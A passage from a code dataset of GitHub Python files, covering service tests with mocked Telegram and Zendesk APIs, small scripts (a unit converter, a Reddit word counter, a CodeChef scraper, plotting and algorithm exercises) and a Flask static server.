'eats_integration_offline_orders',\n files=['db.sql', 'restaurant_options_all_enabled.sql'],\n)\n@pytest.mark.config(\n EI_OFFLINE_ORDERS_PAY_METHOD_SETTINGS={'include_cash': False},\n)\nasync def test_call_waiter_telegram(\n web_context,\n web_app_client,\n mockserver,\n patch,\n params: dict,\n result_kwargs: dict,\n):\n @patch('aiogram.bot.api.Methods.api_url')\n def _api_url(token, method):\n return '$mockserver/telegram/bot{token}/{method}'.format(\n token=token, method=method,\n )\n\n @mockserver.json_handler(\n '/telegram/bot123456:ABC-DEF1234aaaaa-zyx11A1a1a111aa11/sendMessage',\n )\n def telegram_send_message(request):\n kwargs = parse.parse_qs(request.get_data().decode())\n assert str(GROUP_CHAT_ID) == kwargs['chat_id'][0]\n text = telegram_render(\n web_context,\n params.get('call_waiter_type', 'call'),\n **result_kwargs,\n )\n assert text == kwargs['text'][0]\n return {'ok': True, 'result': {}}\n\n response = await web_app_client.post(f'/v1/call-waiter', params=params)\n assert response.status == 200\n assert telegram_send_message.times_called == 1\n\n\n@pytest.mark.pgsql(\n 'eats_integration_offline_orders',\n files=['db.sql', 'restaurant_options_no_payment_offline.sql'],\n)\n@pytest.mark.config(\n EI_OFFLINE_ORDERS_PAY_METHOD_SETTINGS={'include_cash': True},\n)\nasync def test_call_waiter_offline_payment(\n taxi_eats_integration_offline_orders_web, pgsql,\n):\n params = {\n 'uuid': TABLE_UUID,\n 'comment': COMMENT,\n 'call_waiter_type': 'cash_payment',\n }\n\n response = await taxi_eats_integration_offline_orders_web.post(\n f'/v1/call-waiter', params=params,\n )\n assert response.status == 400\n\n\nDEFAULT_PLACE_ID = '3fa85f64-5717-4562-b3fc-2c963f66afa6'\nDEFAULT_WAITER_ID = '1965cdbe-cac1-44ba-9355-d5da6fd87009'\n\n\n@pytest.mark.config(\n EATS_INTEGRATION_OFFLINE_ORDERS_IIKO_WAITER={'host': '$mockserver'},\n)\n@pytest.mark.pgsql(\n 'eats_integration_offline_orders', files=['db.sql', 'db_iiko_waiter.sql'],\n)\nasync def test_call_iiko_waiter(web_app_client, mockserver):\n @mockserver.handler('/api/v1/notifications/mobile/waiter-call')\n def _get_test_call_waiter(request):\n assert request.json['userId'] == DEFAULT_WAITER_ID\n return mockserver.make_response('', status=202)\n\n response = await web_app_client.post(\n f'/v1/call-waiter?uuid={DEFAULT_PLACE_ID}'\n f'&waiter_id={DEFAULT_WAITER_ID}',\n )\n assert response.status == 200\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_eats_integration_offline_orders/web/test_call_waiter.py","file_name":"test_call_waiter.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6815923611","text":"import csv\nwith open(\"./Mappa-delle-tabaccherie-in-Italia.csv\", newline=\"\", encoding=\"ISO-8859-1\") as filecsv:\n lettore = csv.reader(filecsv,delimiter=\";\")\n header = next(lettore)\n print(header)\n Anno = input('Inserisci anno inserimento della tabaccheria: ')\n dati = [(riga[0], riga[1], riga[2], riga[3], riga[4], riga[5], riga[6], riga[7], riga[8]) for riga in lettore if riga[4] == Anno]\n for tabaccheria in dati:\n print(f\"\"\"\n {tabaccheria[:1]},{tabaccheria[:2]} \n -- Coordinate: {tabaccheria[8]},{tabaccheria[7]}\")\n \"\"\")\n","repo_name":"dado75/ProgrammoInPython","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16036321016","text":"from __future__ import division\nimport matplotlib\n#matplotlib.use('Agg') # Can also use 'tkagg' or 'webagg'\n#from plot_neb_tio2 import *\nfrom matplotlib.offsetbox import TextArea, VPacker, AnnotationBbox\nimport matplotlib.patches as patches\nfrom math import ceil, floor\nimport matplotlib.pyplot as plt\nfrom ase.io import read, write\nfrom ase.visualize import view\nimport matplotlib.patches as mpatches\nfrom ase.data.colors import jmol_colors\nfrom decimal import Decimal \nfrom pylab import *\nfrom ase.data import covalent_radii as aradii\nfrom matplotlib.patches import Circle\nfrom math import atan2,pi\nimport matplotlib.gridspec as gridspec\n\nmatplotlib.rc('xtick', labelsize=14)\nmatplotlib.rc('ytick', labelsize=14)\n\n\n\ndef plot_atoms(ax, atoms, xyz, acols, alp, z):\n\n ecols = [[0, 0, 0] for col in atoms]\n\n indices = range(len(atoms))\n for ia in indices:\n acol = acols[ia]\n ecol = ecols[ia]\n arad = aradii[atoms[ia].number] \n apos = atoms[ia].position\n eps = arad\n\n circ = Circle([apos[xyz[0]], apos[xyz[1]]],\n fc = acol,\n ec = ecol,\n radius = arad,\n lw = 0.5,\n # alpha = alp[ia],\n #zorder = 1 - apos[1]/1000\n zorder =1.0\n )\n ax.add_patch(circ)\n\n\n\ndef plot_conf(ax, atoms, colorlenth,rot=False):\n colors = np.array([jmol_colors[atom.number] for atom in atoms])\n positions =atoms.get_positions()\n for i, atom in enumerate(atoms):\n if (positions[i,0]<=12.5 or positions[i,0]>=24.75):\n colors[i] =[255/255, 255/255, 255/255]\n\n alp = [None] * colors.shape[0]\n #for i,a in enumerate(atoms):\n # if a.symbol == 'Al' or a.symbol == 'O':\n # if a.position[2] < 9.7:\n # alp[i] = 1.0\n\n if rot:\n # atoms.rotate('x',pi/2)\n atoms.rotate('y',np.radians(-90),rotate_cell=True)\n atoms.rotate('z',np.radians(-90),rotate_cell=True)\n\n plot_atoms(ax, atoms, [0,2,1], colors, alp, z=-1)\n\n#-----------------------------------------------------------#\nfig = plt.figure(figsize=(6.0,5))\nouter = gridspec.GridSpec(1, 1, wspace=0.04, hspace=0.2)\n\ncolor_lib = ['#00FF00','#377eb8','#4daf4a','#00FFFF','#a65628','#FF0000','#0000FF', '#FF00FF','#FFFF00','#000000']\n#---------------------- Pt7 clusters -------------------------------------#\ndata=read(sys.argv[1]+'@:')\nfor j in range(0,len(data)):\n #inner = gridspec.GridSpecFromSubplotSpec(2, 1,subplot_spec=outer[j], wspace=0.00, hspace=0.0, height_ratios=[6.86,9.9])\n atoms = data[j]\n colorlenth = len(atoms)\n atoms =atoms*(1,3,1)\n print(colorlenth)\n # write('newimage.traj',atoms)\n a=atoms\n #view(atoms)\n del atoms[atoms.positions[:,1] <=6.0]\n del atoms[atoms.positions[:,1] >=28.0]\n #view(atoms)\n colorlenth = len(atoms)\n cell = atoms.get_cell()\n # 0 0\n ax = plt.Subplot(fig, outer[0])\n img = atoms.copy()\n plot_conf(ax, img,colorlenth,rot=False)\n\n #ax.set_xlim([0.20, 0.60])\n #ax.set_ylim([0.0, 20.0])\n ax.set_yticks([])\n ax.set_xticks([])\n ax.set(aspect=1)\n fig.add_subplot(ax)\n #----------------- drawing box -------------------------------#\n xlim = ax.get_xlim()\n ylim = ax.get_ylim()\n print(xlim)\n print(ylim)\n box_x = [xlim[0], xlim[1], xlim[1], xlim[0], xlim[0]]\n box_y =[ylim[0], ylim[0], ylim[1], ylim[1], ylim[0]]\n ax.add_patch(\n patches.Rectangle(\n (box_x[0],box_y[0]),\n xlim[1]-xlim[0],\n ylim[1]-ylim[0],\n fill=True,facecolor='white', clip_on=False,zorder =0.8) )\n ax.plot(box_x, box_y, color='blue',linewidth=5.0)\n\nname = sys.argv[2]\nname =name\nsavefig(name,bbox_inches='tight')\nshow()\nexit()\n","repo_name":"sivachiriki/GOFEE_Pt_V_supported","sub_path":"Platinum_clusters_Project/Al2O3_0001surface_used/Ptoxides_zorderimage_new.py","file_name":"Ptoxides_zorderimage_new.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32724230976","text":"\"\"\"\nThis is a simple flask server\nthat handles requests from the frontend\n\"\"\"\nimport os\nfrom flask import Flask, send_from_directory\nfrom vaccFunctions import VaccFunctions\n\nCURRENT_DIR = os.path.dirname(__file__)\nclient_folder = CURRENT_DIR + '/../client/build/'\napp = Flask(__name__, static_folder=client_folder)\n\n# account for imported request handlers\napp.register_blueprint(VaccFunctions)\n\n# Serve React App\n@app.route('/', defaults={'path': ''})\n@app.route('/')\ndef serve(path):\n if path != \"\" and os.path.exists(client_folder + path):\n return send_from_directory(client_folder, path)\n else:\n return send_from_directory(client_folder, 'index.html')\n\n\nif __name__ == '__main__':\n app.run(use_reloader=True, port=5000, threaded=True)\n","repo_name":"SarthakHa/VaccineGuidecuHacking","sub_path":"server/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"70306653971","text":"__author__ = \"Tsh\"\n\nfrom MestVanlig import MestVanlig\nfrom Tilfeldig import Tilfeldig\nfrom Sekvensiell import Sekvensiell\nfrom Aksjon import Aksjon\nfrom Historiker import Historiker\n\nclass MangeSpill(object):\n\n poeng = {\"vinner\": 1, \"taper\": 0, \"uavgjort\": 0.5}\n\n def __init__(self, spiller1, spiller2, antall_spill):\n self.spiller1 = spiller1\n self.spiller2 = spiller2\n self.antall_spill = antall_spill\n\n def arranger_enkeltspill(self):\n spiller1_aksjon = self.spiller1.velg_aksjon()\n spiller2_aksjon = self.spiller2.velg_aksjon()\n\n spiller1_aksjonliste = {\"you\": spiller1_aksjon, \"enemy\": spiller2_aksjon}\n spiller2_aksjonliste = {\"you\": spiller2_aksjon, \"enemy\": spiller1_aksjon}\n\n if spiller1_aksjon > spiller2_aksjon:\n self.spiller1.motta_resultat(spiller1_aksjonliste, self.poeng[\"vinner\"])\n self.spiller2.motta_resultat(spiller2_aksjonliste, self.poeng[\"taper\"])\n return \"{spiller1}: {aksjon1} {spiller2}: {aksjon2} -> {spiller1} vant\".format(\n spiller1=self.spiller1.oppgi_navn(),\n spiller2=self.spiller2.oppgi_navn(),\n aksjon1=str(spiller1_aksjon),\n aksjon2=str(spiller2_aksjon),\n )\n\n elif spiller2_aksjon > spiller1_aksjon:\n self.spiller1.motta_resultat(spiller1_aksjonliste, self.poeng[\"taper\"])\n self.spiller2.motta_resultat(spiller2_aksjonliste, self.poeng[\"vinner\"])\n return \"{spiller1}: {aksjon1} {spiller2}: {aksjon2} -> {spiller2} vant\".format(\n spiller1=self.spiller1.oppgi_navn(),\n spiller2=self.spiller2.oppgi_navn(),\n aksjon1=str(spiller1_aksjon),\n aksjon2=str(spiller2_aksjon),\n )\n\n else:\n self.spiller1.motta_resultat(spiller1_aksjonliste, self.poeng[\"uavgjort\"])\n self.spiller2.motta_resultat(spiller2_aksjonliste, self.poeng[\"uavgjort\"])\n return \"{spiller1}: {aksjon1} {spiller2}: {aksjon2} -> Uavgjort\".format(\n spiller1=self.spiller1.oppgi_navn(),\n spiller2=self.spiller2.oppgi_navn(),\n aksjon1=str(spiller1_aksjon),\n aksjon2=str(spiller2_aksjon),\n )\n\n def arranger_turnering(self):\n for i in range(self.antall_spill):\n print(self.arranger_enkeltspill())\n print(self.spiller1.oppgi_navn() + \" fikk: \" + str(self.spiller1.poeng))\n print(self.spiller2.oppgi_navn() + \" fikk: \" + str(self.spiller2.poeng))\n\nif __name__ == \"__main__\":\n ms = MangeSpill(Sekvensiell(), Historiker(2), 10)\n ms.arranger_turnering()","repo_name":"trondhumbor/Plab2","sub_path":"RockScissorPaper/MangeSpill.py","file_name":"MangeSpill.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33565009305","text":"from os import path\n\n# TYPING\nfrom typing import List\nfrom datatypes import Matrix, GeneticSolution, GreedySolution\n\n# GENETIC ALGORITHM\nfrom genetic_algorithm.genetic_algorithm import GeneticAlgorithm\nfrom genetic_algorithm.functions import *\n\n# GREEDY ALGORITHM\nfrom greedy.greedy import Greedy\n\n# UTILS\nimport utils\n\n\ndef running_ga_instance(\n distances: Matrix[int],\n optimum: List[int]) -> GeneticSolution:\n number_generations: int = 300\n population_size: int = 500\n crossover_rate: float = 0.3\n mutation_rate: float = 0.1\n number_parents: int = 200\n number_mutations: int = 6\n verbose: bool = True\n minimum_fitness: int = fitness(optimum[:-1], distances)\n\n solver: GeneticAlgorithm = GeneticAlgorithm(\n distances, optimum, selection_function=select_parents,\n crossover_function=single_point_crossover, mutation_function=mutate,\n fitness_function=fitness,\n generation_function=generate_population)\n\n solution, profit, history = solver(\n number_generations, population_size, crossover_rate, mutation_rate,\n number_parents, number_mutations, minimum_fitness, verbose)\n\n return solution, profit, history\n\n\ndef running_greedy_instance(distances: Matrix[int]) -> GreedySolution:\n greedy = Greedy(distances)\n\n solution, profit = greedy()\n\n return solution, profit\n\n\ndef main():\n distances_file_path: str = path.join(\"dataset\", \"distances.txt\")\n optimum_file_path: str = path.join(\"dataset\", \"optimum.txt\")\n xy_file_path: str = path.join(\"dataset\", \"xy.txt\")\n\n distances, optimum, xy = utils.get_dataset(\n distances_file_path, optimum_file_path, xy_file_path)\n\n # solution, profit, history = running_ga_instance(distances, optimum)\n solution, profit = running_greedy_instance(distances)\n\n print(f\"solution is {solution} with profit {profit}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mohamedfouadhanani/travelling-salesman-problem","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28187981753","text":"# -*- coding: utf-8 -*-\r\nimport cv2\r\nimport numpy as np\r\nimport math\r\nimport time\r\nimport matplotlib.pyplot as plt\r\nfrom numba import jit\r\n\r\n@jit\r\ndef main():\r\n img = cv2.imread(\"code5.bmp\")\r\n imh, imw, imc = img.shape\r\n \r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n gyh, gyw = gray.shape\r\n \r\n list = range(0,256)\r\n\r\n plt.figure(1)\r\n plt.subplot(1,2,1)\r\n plt.imshow(gray,'gray',vmin=0,vmax=255)\r\n \r\n plt.subplot(1,2,2) \r\n hist = cv2.calcHist([gray],[0],None,[256],[0,256])\r\n plt.bar(np.arange(0,256), hist[:,0], color='k', width=1.0)\r\n plt.xlim([0,255])\r\n\r\n c = ['b','g','r']\r\n for i in range(3):\r\n hist =cv2.calcHist([img],[i],None,[256],[0,256])\r\n plt.plot(np.arange(0,256), hist[:,0], color=c[i])\r\n plt.xlim([0,255])\r\n\r\n plt.savefig(\"code3.1.jpg\")\r\n plt.show()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"e1b16079/datebank","sub_path":"基礎演習/画像処理/一日目/program13.py","file_name":"program13.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4768632005","text":"#!/usr/bin/python3\n\"\"\"\nqueries the Reddit API\n\"\"\"\nimport requests\nfrom collections import defaultdict\n\n\ndef count_words(subreddit, word_list, after=None, counts=None):\n \"\"\"\n queries the Reddit API, parses the title of all hot articles\n and prints a sorted count of given keywords\n \"\"\"\n if after is None:\n url = \"https://www.reddit.com/r/{}/hot.json?limit=100\".format(\n subreddit)\n else:\n url = \"https://www.reddit.com/r/{}/hot.json?limit=100&after={}\".format(\n subreddit, after)\n\n if counts is None:\n counts = defaultdict(int)\n\n headers = {'User-Agent': 'chris'}\n response = requests.get(url, headers=headers, allow_redirects=False)\n if response.status_code == 200:\n data = response.json()\n posts = data['data']['children']\n for post in posts:\n title = post['data']['title'].lower()\n t = \" {} \".format(title)\n\n for word in word_list:\n w = \" {} \".format(word.lower())\n if w in t:\n counts[word.lower()] += 1\n\n after = data['data']['after']\n if after:\n return count_words(subreddit, word_list, after, counts)\n\n sorted_counts = sorted(counts.items(),\n key=lambda item: (-item[1], item[0]))\n\n for word, count in sorted_counts:\n print(f\"{word}: {count}\")\n else:\n return None\n","repo_name":"sakachris/alx-system_engineering-devops","sub_path":"0x16-api_advanced/100-count.py","file_name":"100-count.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42009365838","text":"import torch\nimport dgl\nimport numpy as np\nimport random\nfrom sklearn.metrics import roc_auc_score, accuracy_score\n\ndef split_data(hg, etype_name, train_ratio, eval_ratio, test_ratio):\n src, dst = hg.edges(etype=etype_name)\n etype_src = src.numpy().tolist()\n etype_dst = dst.numpy().tolist()\n \n num_link = len(etype_src)\n\n pos_label=[1]*num_link\n pos_data=list(zip(etype_src, etype_dst, pos_label))\n\n etype_adj = np.array(hg.adj(etype=etype_name).to_dense())\n full_idx = np.where(etype_adj==0)\n\n sample = random.sample(range(0, len(full_idx[0])), num_link)\n neg_label = [0]*num_link\n neg_data = list(zip(full_idx[0][sample],full_idx[1][sample], neg_label))\n \n full_data = pos_data + neg_data\n random.shuffle(full_data)\n\n train_size = int(len(full_data) * train_ratio)\n eval_size = int(len(full_data) * eval_ratio)\n test_size = len(full_data) - train_size - eval_size\n \n train_data = full_data[:train_size]\n eval_data = full_data[train_size : train_size+eval_size]\n test_data = full_data[train_size+eval_size : train_size+eval_size+test_size]\n train_data = np.array(train_data)\n eval_data = np.array(eval_data)\n test_data = np.array(test_data)\n \n return train_data, eval_data, test_data\n\ndef evaluate_auc(pred, label):\n res=roc_auc_score(y_score=pred, y_true=label)\n return res\n\ndef evaluate_acc(pred, label):\n res = []\n for _value in pred:\n if _value >= 0.5:\n res.append(1)\n else:\n res.append(0)\n return accuracy_score(y_pred=res, y_true=label)","repo_name":"CLIS-237/test_ELG","sub_path":"Link_Prediction/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20269313009","text":"# https://leetcode.com/problems/valid-palindrome/\n# Solution 1\ndef isPalindrome(self, s: str) -> bool:\n s = s.lower()\n preprocessing = []\n for ch in s:\n if 48 <= ord(ch) <= 57 or 97 <= ord(ch) <= 122:\n preprocessing.append(ch)\n\n # Now, check it!!\n i, j = 0, len(preprocessing)-1\n while i < j:\n if preprocessing[i] != preprocessing[j]:\n return False\n j -= 1\n i += 1\n return True\n# Solution 2\n\n\ndef isPalindrome(s: str) -> bool:\n i, j = 0, len(s) - 1\n while i < j:\n while i < j and not isAlphaNum(s[i]):\n i += 1\n while i < j and not isAlphaNum(s[j]):\n j -= 1\n if s[i].lower() != s[j].lower():\n return False\n i, j = i + 1, j - 1\n return True\n\n# Could write own alpha-numeric function\n\n\ndef isAlphaNum(c):\n return (\n ord(\"A\") <= ord(c) <= ord(\"Z\")\n or ord(\"a\") <= ord(c) <= ord(\"z\")\n or ord(\"0\") <= ord(c) <= ord(\"9\"))\n","repo_name":"mchi11/160Question","sub_path":"twoPointers/validPalind.py","file_name":"validPalind.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17628776802","text":"#!/usr/bin/env python3\n\"\"\"calculates the integral of a polynomial\"\"\"\n\n\ndef poly_integral(poly, C=0):\n \"\"\"calculates integral of a poly\n Args\n poly (list): polynomial list\n C (int): representing the integration constant\n Returns\n (list): list of coefficients\n \"\"\"\n if not all(type(C) in (float, int) for c in poly) or type(C) is not int:\n return None\n integral = [c/a if c % a != 0 else c//a for a, c in enumerate(poly, 1)]\n while len(integral) > 0 and integral[-1] == 0:\n integral.pop()\n return [C] + integral\n","repo_name":"s0m35h1t/holbertonschool-machine_learning","sub_path":"math/0x02-calculus/17-integrate.py","file_name":"17-integrate.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9934392330","text":"from tkinter import *\n\nroot = Tk()\n\nroot.title(\"Feet to Centimeter Convertor\")\nroot.geometry(\"350x280\")\nroot.resizable(height=False, width=False)\n\n\ndef convert_to_cm():\n ft_input = float(ft_entry.get())\n centi = ft_input * 30.48\n cm_value.set(\"%.4f\" % centi)\n\n\ndef convert_to_ft():\n cm_input = float(cm_entry.get())\n feet = cm_input / 30.48\n ft_value.set(\"%.4f\" % feet)\n\n\ndef clear():\n cm_value.set(\"\")\n ft_value.set(\"\")\n\n\n# Widgets for feet\nft_label = Label(root, text=\"Feet\", bg=\"#D7CACA\", width=14)\nft_label.grid(row=0, column=2)\n\nft_value = DoubleVar()\nft_entry = Entry(root, textvariable=ft_value, width=14)\nft_entry.grid(row=0, column=0, padx=35, pady=40)\nft_entry.delete(0, 'end')\n\n# Widgets for cm\ncm_label = Label(root, text=\"Centimeter\", width=14, bg=\"#D7CACA\")\ncm_label.grid(row=1, column=2)\n\ncm_value = DoubleVar()\ncm_entry = Entry(root, textvariable=cm_value, width=14)\ncm_entry.grid(row=1, column=0)\ncm_entry.delete(0, 'end')\n\n# Widget for convert and clear\nto_convert_ft = Button(root, text=\"Convert to CM\", bg=\"blue\", command=convert_to_cm)\nto_convert_ft.grid(row=3, column=0, padx=25, pady=30)\n\nto_convert_cm = Button(root, text=\"Convert to Feet\", bg=\"blue\", command=convert_to_ft)\nto_convert_cm.grid(row=3, column=2)\n\nto_clear = Button(root, text=\"Clear\", bg=\"blue\", command=clear)\nto_clear.grid(row=4, column=0)\n\nunit_value = Label(root, text=\"1 feet = 30.48 Cm\")\nunit_value.grid(row=4, column=2)\n\nroot.mainloop()\n","repo_name":"karuna-sth/Python-Programs","sub_path":"GUI Applications/feetToCentimeter.py","file_name":"feetToCentimeter.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"41643611846","text":"#!/usr/bin/python3\n\nimport re\n\nrandStr = \"12345 12345-1234 1234 12346-333\"\n# Match 5 digit codes or 5 digits with a hyphen, then 4 digits\nregex = re.compile(r\"(\\d{5}|\\d{5}-\\d{4})\\s\")\nmatches = re.findall(regex, randStr)\n\nfor i in matches:\n print(i)\n","repo_name":"OgagaOnuta/Dust","sub_path":"Python/Derek_Banas-Learn_to_Program/x180.py","file_name":"x180.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13873394235","text":"import requests\nfrom bs4 import BeautifulSoup as bs\n\n\nclass User:\n \"\"\"\n First, create an object of class `User`\n ```python\n user1 = User(id=\"heltion\")\n ```\n | Methods | Details |\n | --------------- | ---------------------------------------------------------------- |\n | `get_profile()` | Returns name, username, profile_image_link, rating, details etc. |\n \"\"\"\n\n def __init__(self, id):\n self.id = id\n\n def get_profile(self):\n \"\"\"\n Create an object of the 'User' class\\n\n ```python\n user1 = User(id=\"heltion\")\n user1.get_profile()\n ```\n Response\n ```js\n {\n 'name': 'Yaowei Lyu',\n 'username': 'heltion',\n 'profile_image_link': 'https://cdn.codechef.com/sites/all/themes/abessive/images/user_default_thumb.jpg',\n 'rating':\n {\n 'star': '7★',\n 'current_rating': '2555',\n 'division': '1',\n 'highest_rating': '2555',\n 'global_rank': '72',\n 'country_rank': '8'\n },\n 'details':\n {\n 'country_flag_link': 'https://cdn.codechef.com/download/flags/24/cn.png',\n 'country_name': 'China',\n 'user_type': 'Student',\n 'institution': 'Zhejiang University China'\n }\n }\n ```\n \"\"\"\n try:\n url = f\"https://www.codechef.com/users/{self.id}\"\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.3; Win 64 ; x64) Apple WeKit /537.36(KHTML , like Gecko) Chrome/80.0.3987.162 Safari/537.36\"\n }\n response = requests.get(url, headers=headers).text\n soup = bs(response, \"lxml\")\n\n user_details_box = soup.find(\"div\", {\"class\": \"user-details-container\"})\n header_box = user_details_box.find(\"header\")\n profile_image_link = header_box.find(\"img\")[\"src\"]\n profile_name = header_box.find(\"h1\").text.strip()\n profile_details_box = user_details_box.find(\"section\")\n profile_details_ul = profile_details_box.find(\"ul\")\n profile_details_li = profile_details_ul.find_all(\"li\")\n\n # star\n profile_star = (\n profile_details_li[0].find(\"span\", {\"class\": \"rating\"}).text.strip()\n )\n # Username\n profile_username = (\n profile_details_li[0]\n .find(\"span\", {\"class\": \"m-username--link\"})\n .text.strip()\n )\n # Country\n country_flag_link = profile_details_li[1].find(\n \"img\", {\"class\": \"user-country-flag\"}\n )[\"src\"]\n country_name = (\n profile_details_li[1]\n .find(\"span\", {\"class\": \"user-country-name\"})\n .text.strip()\n )\n # User Type\n user_type = profile_details_li[2].find(\"span\").text.strip()\n # Institution\n institution = profile_details_li[3].find(\"span\").text.strip()\n\n profile_rating_box = soup.find(\n \"aside\", {\"class\": \"sidebar small-4 columns pr0\"}\n )\n\n # Current Rating\n rating_box = profile_rating_box.find(\"div\", {\"class\": \"rating-header\"})\n rating_divs = rating_box.find_all(\"div\")\n current_rating = rating_divs[0].text.strip()\n # Division\n division = (\n rating_divs[1]\n .text.strip()\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .replace(\"Div \", \"\")\n )\n # Highest Rating\n highest_rating = (\n rating_box.find(\"small\")\n .text.strip()\n .replace(\"(Highest Rating \", \"\")\n .replace(\")\", \"\")\n )\n\n # Ranks\n ranks_box = profile_rating_box.find(\"div\", {\"class\": \"rating-ranks\"})\n ranks_list = ranks_box.find_all(\"strong\")\n global_rank = ranks_list[0].text.strip()\n country_rank = ranks_list[1].text.strip()\n\n profile_data = {\n \"name\": profile_name,\n \"username\": profile_username,\n \"profile_image_link\": profile_image_link,\n \"rating\": {\n \"star\": profile_star,\n \"current_rating\": current_rating,\n \"division\": division,\n \"highest_rating\": highest_rating,\n \"global_rank\": global_rank,\n \"country_rank\": country_rank,\n },\n \"details\": {\n \"country_flag_link\": country_flag_link,\n \"country_name\": country_name,\n \"user_type\": user_type,\n \"institution\": institution,\n },\n }\n return profile_data\n except:\n return None\n","repo_name":"Clueless-Community/scrape-up","sub_path":"src/scrape_up/codechef/codechef.py","file_name":"codechef.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"66"} +{"seq_id":"86853602213","text":"import datetime\nimport unittest\n\nfrom zenpy.lib import exception\nfrom zenpy.lib.api_objects import Ticket\nfrom zenpy.lib.api_objects import User as ZendeskUser\n\nfrom help_desk_client.interfaces import (\n HelpDeskComment,\n HelpDeskCustomField,\n HelpDeskException,\n HelpDeskTicket,\n HelpDeskTicketNotFoundException,\n HelpDeskUser,\n Priority,\n Status,\n TicketType,\n)\nfrom help_desk_client.zendesk_manager import ZendeskManager\n\n\nclass FakeUser(object):\n def __init__(self, *args, **kwargs):\n self.id = kwargs.get(\"id\")\n self.name = kwargs.get(\"name\")\n self.email = kwargs.get(\"email\")\n\n\nclass FakeUserResponse(object):\n def __init__(self, user_id):\n self.id = user_id\n\n\nclass FakeTicket(object):\n def __init__(self, ticket_id, requester=None):\n self.id = ticket_id\n self.status = \"open\"\n self.description = \"fakedescription\"\n self.subject = \"fakesubject\"\n self.requester_id = 1234\n self.requester = requester\n\n\nclass FakeTicketAudit(object):\n def __init__(self, ticket):\n self.ticket = ticket\n\n\nclass FakeApi(object):\n \"\"\"Aid testing tickets without using Zendesk API directly.\"\"\"\n\n class FakeUsers(object):\n def __init__(self, parent, me=None):\n self._me = me\n self._next_userid = 1\n self.parent = parent\n\n def create_or_update(self, zendesk_user: ZendeskUser) -> ZendeskUser:\n if zendesk_user.id:\n userid = zendesk_user.id\n else:\n zendesk_user.id = userid = self._next_userid\n self._next_userid += 1\n self.parent._users[userid] = zendesk_user\n return zendesk_user\n\n def me(self):\n return self._me\n\n def __call__(self, id: int) -> ZendeskUser:\n \"\"\"Recover a specific user.\"\"\"\n user = self.parent._users.get(id, None)\n if user:\n return user\n else:\n return None\n\n class FakeTicketCRUD(object):\n def __init__(self, parent, ticket_audit=None):\n self.ticket_audit = ticket_audit\n self._next_ticket_id = 1\n self.parent = parent\n\n def update(self, ticket):\n \"\"\"No actual update performed\"\"\"\n tickettoupdate = self.parent._tickets.get(ticket.id, None)\n if tickettoupdate:\n self.parent._tickets[ticket.id] = ticket\n return FakeTicketAudit(ticket)\n else:\n return None\n\n def create(self, ticket):\n \"\"\"Pretend to create a zendesk ticket and return the canned\n result.\n \"\"\"\n ticket.id = self._next_ticket_id\n ticket.created_at = datetime.datetime.now()\n self.parent._tickets[ticket.id] = ticket\n self._next_ticket_id += 1\n return FakeTicketAudit(ticket)\n\n def __call__(self, id: int) -> Ticket:\n \"\"\"Recover a specific ticket.\"\"\"\n ticket = self.parent._tickets.get(id, None)\n if ticket:\n return ticket\n else:\n raise exception.RecordNotFoundException\n\n def __init__(self, tickets=[], me=None, ticket_audit=None, users=[]):\n self.results = tickets\n self._users: dict[int, FakeUser] = dict([(user.id, user) for user in users])\n self.users = self.FakeUsers(self, me=me)\n self._tickets: dict[int, FakeTicket] = dict(\n [(ticket.id, ticket) for ticket in tickets]\n )\n self.tickets = self.FakeTicketCRUD(self, ticket_audit)\n\n for ticket in tickets:\n self._tickets[ticket.id] = ticket\n\n def search(self, chat_id, type):\n return self.results\n\n\nclass TestZenDesk(unittest.TestCase):\n def test_zendesk_create_user(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n zendesk_manager.client = FakeApi()\n user = HelpDeskUser(\n full_name=\"Jim Example\", email=\"test@example.com\" # test email /PS-IGNORE\n )\n heldeskuser = zendesk_manager.get_or_create_user(user=user)\n\n assert heldeskuser.id == 1\n\n def test_zendesk_get_user(self):\n zendesk_manager = 